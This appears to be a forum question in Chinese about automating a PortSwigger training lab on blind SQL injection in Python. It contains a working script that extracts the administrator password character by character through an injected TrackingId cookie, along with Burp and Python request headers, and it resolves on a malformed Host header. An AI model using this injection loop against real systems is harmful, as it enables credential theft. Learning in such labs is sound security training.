我正在做 portswigger 盲 SQL 实验室:https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses
在拦截请求后的burp转发器中,它工作正常,因为解决方案有点乏味,我虽然用python将其自动化,但它返回了这个响应
<html><head><title>Client Error: Forbidden</title></head><body><h1>Client Error: Forbidden</h1></body></html>
我有完全相同的标头和cookie,但不知道为什么它在 burp 上工作而不是在 python 请求上工作,这两个不一样。 蟒蛇代码:
import pprint
import time
import requests
from bs4 import BeautifulSoup
from collections import OrderedDict
url = "https://xxxxxxxxxxxxxxxxx.web-security-academy.net/filter?category=Lifestyle"
headers_string = """Host: xxxxxxxxxxxxxxxxxxxxxx.web-security-academy.net/
Sec-Ch-Ua: "Chromium";v="127", "Not)A;Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: redacted
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://xxxxxxxxxxxxxxxxxxxxxxxxx.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
"""
header_dict = OrderedDict()
for line in headers_string.splitlines():
header, value = line.split(":", 1)
header_dict[header] = value.strip("\n").strip(' ')
with open("payload.txt", 'r') as f:
payloads = [i.strip('\n') for i in f.readlines()]
for i in range(1, 21):
for p in payloads:
cookie = f"TrackingId=xxxxxxxxxxxxx' AND (SELECT SUBSTRING(password, {i}, 1) FROM users WHERE username ='administrator')='{p}; session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
header_dict["Cookie"] = cookie
res = requests.get(url, headers=header_dict)
print(res.request.headers)
print(res.headers)
print(len(res.text))
print(res.text)
print(f"Trying payload: {p} at position {i}")
if "Welcome back!" in res.text:
print(f"Found password character {p} at position {i}")
time.sleep(102)
print("========================================================")
这是打印 res.request.headers 的结果
{'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36', 'Accept-Encoding': 'gzip, deflate, br', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'Connection': 'keep-alive', 'Host': '0a9000d9049e1c2c80cc719600010093.web-security-academy.net/', 'Sec-Ch-Ua': '"Chromium";v="127", "Not)A;Brand";v="99"', 'Sec-Ch-Ua-Mobile': '?0', 'Sec-Ch-Ua-Platform': '"Windows"', 'Accept-Language': 'en-GB', 'Upgrade-Insecure-Requests': '1', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'document', 'Referer': 'https://0a9000d9049e1c2c80cc719600010093.web-security-academy.net/', 'Priority': 'u=0, i', 'Cookie': "TrackingId=8y60pwYvV2VwjwZm' AND (SELECT SUBSTRING(password, 1, 1) FROM users WHERE username ='administrator')='a; session=LOdCvKmB6g9uLyM0RKnaOqRewmSfZrm8"}
payload.txt 每行都有 a-z、0-9
解决方案是通过20个字符的盲sqli来猜测密码,这就是为什么我想使用python这样我可以理解更多,而不是依赖工具。 burp 套件标头
GET /filter?category=Gifts HTTP/2
Host: xxxxxxxxxxxxxxxxxxxxx.web-security-academy.net
Cookie: TrackingId=xxxxxxxxxxx' AND (SELECT SUBSTRING(password, 1, 1) FROM users WHERE username ='administrator')='a; session=LOdCvKmB6g9uLyM0RKnaOqRewmSfZrm8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Sec-Ch-Ua: "Chromium";v="127", "Not)A;Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://xxxxxxxxxxxxxxxxxxxxx.web-security-academy.net/filter?category=Gifts
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Content-Length: 2
主机末尾有一个 / 导致错误,愚蠢的错误